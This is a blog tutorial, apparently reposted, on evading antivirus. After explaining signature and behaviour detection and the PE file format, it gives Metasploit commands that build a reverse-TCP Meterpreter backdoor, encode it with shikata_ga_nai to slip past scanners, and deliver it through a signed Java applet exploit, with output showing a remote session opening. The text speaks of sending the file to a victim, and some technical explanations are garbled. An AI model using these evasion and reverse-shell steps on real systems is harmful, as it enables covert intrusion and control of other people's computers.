How do you bypass an antivirus?  This is not a new question; everyone who are belongs to ethical hacking and penetration testing groups discuss this issue often. Even new users (script kiddies) are anxious to learn ways to overcome their keyloggers, stealer’s and RAT (remote administrator tools). Clearly, there is a pressing and widespread need by everyone need to bypass an anti-virus, even while in the process of penetration testing and ethical hacking anti-viruses in attempts to create a robust defense for an operating system. Let’s consider a simple example: suppose a company hired you to conduct a vulnerability assessment on their network. They give you a black box test but you aren’t equipped with much information about the network. If they are using an end-to-end anti-virus solution for their network, whenever you launch a test, the anti-virus system in place will defend it. So the first obstacle you’ll need to overcome is bypassing the anti-virus. It is very easy to discuss a tool that can hide any file from the eye of anti-virus systems, but it is probably more effective to understand the story behind the tools or techniques in order to best implement them. In this article we will cover :

  • How Anti-virus works
  • What are the ways (techniques) to bypass an Anti-virus
  • Metasploit tutorial to bypass an anti-virus

How Anti-virus Works

It is very important to discuss the working mechanism and phenomena of anti-viruses, because if you don’t know how an anti-virus works or how an anti-virus system detects viruses, you will limit your ability to effectively cheat or bypass an anti-virus. There are many companies that create their anti-virus in their own way, but they each share two main approaches to detecting a virus:

  • Signature based detection
  • Suspicious Behavior

Signature based detection is the most common and widely used technique. In it, an anti-virus system compares the content of the file to its database. Signature based detection – while a fast and effective technique – is limited in that it can only detect known viruses. The other technique is based on monitoring suspicious activities and behavior. With this technique, an anti-virus continuously observes (in real time) the behavior of a file. If any file overwrites itself and steals data without user permission, than this file treat as a virus.

Example:

Here’s an example to best understand the working mechanism of an anti-virus: let’s say you have installed an anti-virus on your computer. When you plug-in your flash drive (USB), there are two options:

  • Anti-virus will automatically detect viruses (based  suspicious activities)
  • You will launch a scan against your USB and then the anti-virus finds some virus (Signature based detection)

This is how an anti-virus works; now we need to discuss the file format. PE, or portable executive, is the default file format for windows binary. Most of the viruses and malware hide in the PE file. So what is the structure of portable executive file and how does an anti-virus read the signature?

  ------------------
    | DOS-stub          |
    +-------------------+
    |PE file-header     |
    +-------------------+
    | optional header   |
    |- - - - - - - - - -|
    |                   |
    | data directories  |
    |                   |
    +-------------------+
    |                   |
    |   Image pages     |
    |                   |
    +-------------------+
    |                   |
    | section tables    |
    |                   |
    +-------------------+
    |                   |
    | section 1         |
    |                   |
   +----------------+
    |                   |
    | ...               |
    |                   |
    +-------------------+
    |                   |
    | section n         |
    |                   |
    +-------------------+

 

This is the typical structure of the portable executive file. Each section can be divided into multiple sub-sections, but in this article we’ll discuss this with respect to the anti-virus detection methodology. PE (portable executive) file header is the most important section, containing:


  • Signature bytes
  • Time and date stamp
  • Image base and image size
  • Stack reverse size
  • Debug table
  • Fixup table
  • Security table
  • and more

So the PE file header is the one that contains the signature and other important values of any executable file. In the signature file, the first number usually represents a microprocessor type. The typical  microprocessor types are 16-bit, 32-bit and 64-bit. For example, the 80386 processor has a value of 0x14c.

Let’s take an example of a typical netcat backdoor listener, which bind cmd on port number 99 for connecting to the server. By doing a little analysis, we can see that the signature is located on offset E77E.

Now just imagine the importance of the signature in any portable executive file. There are different tools available to find it. If you want to bypass an anti-virus, then you’ll need to modify this signature so that the anti-virus treats it as a normal file.

Below is the list of some utilities that are based on netcat and have the ability to bypass anti-viruses.

  • Cryptcat Project: This is an advanced utility based on netcat and one that uses an encryption technique with the ports of Windows, BSD and Linux.
  • MOCAT backdoor: This one is based on the cryptcat project and works on client and server phenomena, meaning it has two executables: one for windows and the other for Linux. All  communications of MOCAT are encrypted.
  • Ncat : Ncat is a wonderful tool that has been designed by the nmap community. It works on both TCP and UDP ports and on Ipv4 as well as Ipv6.

Bypass an Anti-virus – Metasploit Tutorial

 

The first part of our discussion focused on the importance of encoding to bypass an anti-virus. Metasploit is wonderful tool with many encoders to bypass the anti-viruses. Some of the encoders are based on polymorphic code (polymorphic virus). Polymorphic code changes the signature everytime it infects a new file. Shikata_ga_nai seems to be the best encoder to encode a virus so that your file easily bypass most of the anti-viruses. According to a wonderful blog post published on secmaniac, the best combinations to bypass almost 85 % of the anti-viruses are:

  • Shikata encoding 5 times
  • Alpha_Upper encoding 2 times
  • Shikata encoding 5 times
  • Countdown encoding 5 times

 

Within the social engineering toolkit encoder list, shikata_ga_nai is a particularly good encoder. Take a look at the picture below:

You can find a list of available encoders on metasploit. Please follow the commands below:

 root@bt:~# msfencode -h 

    Usage: /opt/framework/msf3/msfencode

OPTIONS: 

    -a   The architecture to encode as
    -b   The list of characters to avoid: '\x00\xff'
    -c   The number of times to encode the data
    -d   Specify the directory in which to look for EXE templates
    -e   The encoder to use
    -h        Help banner
    -i   Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m   Specifies an additional module search path
    -n        Dump encoder information
    -o   The output file
    -p   The platform to encode for
    -s   The maximum size of the encoded data
    -t   The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -v        Increase verbosity
    -x   Specify an alternate executable template 

---------------------------------------------------------------------------------------------------------------------------
root@bt:~# msfencode -l 

Framework Encoders
================== 

    Name                    Rank       Description
    ----                    ----       -----------
    cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
    cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/none            normal     The "none" Encoder
    mipsbe/longxor          normal     XOR Encoder
    mipsle/longxor          normal     XOR Encoder
    php/base64              great      PHP Base64 encoder
    ppc/longxor             normal     PPC LongXOR Encoder
    ppc/longxor_tag         normal     PPC LongXOR Encoder
    sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
    x64/xor                 normal     XOR Encoder
    x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
    x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
    x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown           normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha            low        Non-Alpha Encoder
    x86/nonupper            low        Non-Upper Encoder
    x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder

 

Example without Encoder

The first demonstration was done without using any encoder. On the second, I will use the best encoder, after which we’ll compare the results of both. Here is the simple backdoor generation step:

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > Desktop/meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
root@bt:~#

 

You can see that the most common and famous anti-viruses have detected some malware in a file. It is therefore not a good practice to send this file to the victim, since an anti-virus can easily detect it.

Example with Encoder

In this example I will use an encoder so that the backdoor will easily be able to bypass anti-viruses. Here’s how to begin:

 root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X | msfencode -c 1 -e x86/shikata_ga_nai > Desktop/meterpreter_1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1) 

root@bt:~#

 


Now you can easily see the difference between these two results.

Bypass An Anti-virus during Exploitation

Now consider the other side of the picture: that automatic exploits face some problems when, though an operating system is vulnerable and you are able to take control of it, but an anti-virus is enabled and can then offend it. Here’s another example :

msf > use exploit/multi/browser/java_signed_applet
msf  exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(java_signed_applet) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf  exploit(java_signed_applet) > exploit
[*] Exploit running as background job. 

[*] Started reverse handler on 192.168.1.12:4444
[*] Using URL: http://0.0.0.0:8080/bOX4eN
[*]  Local IP: http://192.168.1.12:8080/bOX4eN
[*] Server started.
msf  exploit(java_signed_applet) > [*] Handling request from 192.168.1.12:39663...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Generated executable to drop (37888 bytes).
[*] Compiling applet classes...
[*] Compile completed.  Building jar file...
[*] Jar built.  Signing...
[*] Jar signed.  Ready to send.

The victim’s computer is Windows and has an enabled anti-virus AVG, but it has not given any session. Though the victim is vulnerable, the attack will fail due to the anti-virus. Now I will change the scenario slightly: metasploit uses a default template.exe for executive generation, and to bypass an anti-virus, we need to use a custom windows executive.

What about telnet? What other ports are available for remote desktop connection? Pstools is a wonderful resources toolkit with an entirely different command line: tools for administrative purposes. PsExec is among these tools. It is a utility that allows you to execute programs on remote system:

msf exploit(java_signed_applet) > set Template /tmp/pstools/psexec.exe
Template => /tmp/pstools/psexec.exe
msf  exploit(java_signed_applet) > exploit
[*] Exploit running as background job. 

[*] Started reverse handler on 192.168.1.12:4444
[*] Using URL: http://0.0.0.0:8080/bOX4eN
[*]  Local IP: http://192.168.1.12:8080/bOX4eN
[*] Server started. 

msf  exploit(java_signed_applet) > [*] Handling request from 192.168.1.12:39663...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Generated executable to drop (37888 bytes).
[*] Compiling applet classes...
[*] Compile completed.  Building jar file...
[*] Jar built.  Signing...
[*] Jar signed.  Ready to send.
[*] Sending stage (748032 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.8:5807) 

msf exploit(java_signed_applet) > sessions -i 1
[*] Starting interaction with 1...

 

This example shows that encoding is not only a single way to bypass anti-viruses, but that you can easily fool anti-virus because of legitimate files.

Conclusion

 

There are some wonderful tutorials and techniques available to bypass the anti-virus. Among them are some crypter, wrapper and other tools readily found on the internet for the public, but downloading these files from unknown source is not recommended. Some people use these techniques to take advantage of the innocent, so when you download and install such a file, keep in mind that there is a chance that your computer will be at risk for some sort of malware and backdoor(s) attack.

 

Last but not least, never trust any unknown source. Otherwise, you can become the next victim, whether you have an anti-virus or not – now that you have seen how easy is to bypass them.

You may also be interested in:



728x90
저작자표시 비영리 변경금지

'리버싱' 카테고리의 다른 글

Anti-Reversing Techniques  (0) 2011.12.15
From ROP to JOP  (0) 2011.12.15
detail-analysis-advanced-persistent-threat-malware_33814.pdf  (0) 2011.10.28
PEB 구조체를 이용한 간단한 안티디버깅 코드  (0) 2011.10.07
unpack_dragonarmour  (0) 2011.09.06

티스토리툴바